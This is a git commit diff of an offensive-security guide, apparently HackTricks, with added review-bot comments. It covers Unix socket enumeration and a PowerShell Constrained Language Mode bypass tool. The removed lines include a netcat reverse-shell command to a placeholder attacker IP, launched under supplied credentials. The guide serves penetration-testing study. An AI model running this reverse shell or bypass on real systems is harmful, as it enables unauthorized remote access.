GitBook: [master] 2 pages modified
parent 177537e422
commit b4e619098f
@ -432,6 +432,12 @@ _Note that the system must be using that socket file configuration or the backdo
If you **identify any writable socket** \(_now where are talking about Unix Sockets, not about the config `.socket` files_\), then, **you can communicate** with that socket and maybe exploit a vulnerability.
### Enumerate Unix Sockets
```bash
netstat -a -p --unix
```
### HTTP sockets
Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with:
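Review bot: the command under `### Enumerate Unix Sockets` lists sockets but shows no file permissions, so on its own it does not answer the "identify any writable socket" check the paragraph above asks for; suggest following it with `ls -l <socket path>` on each listed path so the reader sees where writability is actually checked. Two smaller points on the same line: `netstat -a -p --unix` only fills the PID/Program name column for sockets owned by the calling user unless run as root, and `netstat` comes from the deprecated net-tools package, so it is worth mentioning the iproute2 equivalent `ss -xap` for hosts that no longer ship it.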
@ -97,7 +97,7 @@ $ExecutionContext.SessionState.LanguageMode
Powershell -version 2
```
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll_ and **change the project to .Net4.5**.
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**.
#### Direct bypass:
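Review bot: escaping the trailing underscore of the DLL path (`.dll\_`) fixes the stray italics, but the same sentence still has three formatting defects that this edit leaves in place: `use[ **PSByPassCLM**]` puts the space inside the link text instead of before it, `_Browse_ ->_Browse_` repeats the step and drops the space after the arrow, and `.Net4.5` is not the product name. Suggest `you can use [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)`, `_Add a Reference_ -> _Browse_ -> add ...` and `.NET 4.5`.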
@ -226,7 +226,6 @@ Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{St
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```
## Groups
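Review bot: in the `[System.Diagnostics.Process]::Start(...)` call the fifth argument maps to the `domain` parameter of the `Start(fileName, arguments, userName, password, domain)` overload, not to a target machine, so `$computer = "<hostname>"` is a misleading name: it only works for a local account because the machine name doubles as that account's domain, and a domain account needs the domain name in that position. Suggest renaming the variable to `$domain` and stating in the surrounding text that the process is started on the local host under other credentials, not on a remote computer.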